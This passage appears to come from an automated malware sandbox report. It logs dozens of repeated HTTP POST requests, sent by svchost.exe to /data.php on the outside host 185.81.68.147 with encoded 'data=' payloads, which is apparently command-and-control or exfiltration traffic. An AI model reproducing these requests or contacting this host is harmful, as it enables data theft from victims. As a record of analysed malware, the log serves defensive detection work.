                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:22.747880936 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:22 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      74192.168.2.549917185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:21.355814934 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:23.034162998 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:22 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      75192.168.2.549922185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:22.990943909 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:24.546575069 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:24 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      76192.168.2.549923185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:23.271975040 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:25.206994057 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:24 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      77192.168.2.549927185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:24.781292915 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      78192.168.2.549930185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:25.453814983 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:27.113961935 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:26 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      79192.168.2.549931185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:25.465718985 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:27.035527945 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:26 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      80192.168.2.549935185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:27.338254929 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:28.928298950 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:28 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      81192.168.2.549938185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:27.410161972 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:29.092658997 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:28 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      82192.168.2.549940185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:29.462893963 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:31.036319971 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:30 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      83192.168.2.549943185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:29.533220053 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:31.237620115 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:30 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      84192.168.2.549947185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:31.262727022 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:06:32.829889059 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:32 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      85192.168.2.549948185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:31.478944063 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      86192.168.2.549954185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:33.060007095 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      87192.168.2.549959185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:35.508236885 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      88192.168.2.549960185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:35.508825064 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      89192.168.2.549970185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:39.628006935 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      90192.168.2.549971185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:39.628374100 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:06:41.326697111 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:06:40 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      91192.168.2.549974185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:41.567056894 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      92192.168.2.549980185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:43.769896030 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      93192.168.2.549981185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:43.769967079 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      94192.168.2.549992185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:48.057634115 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      95192.168.2.549993185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
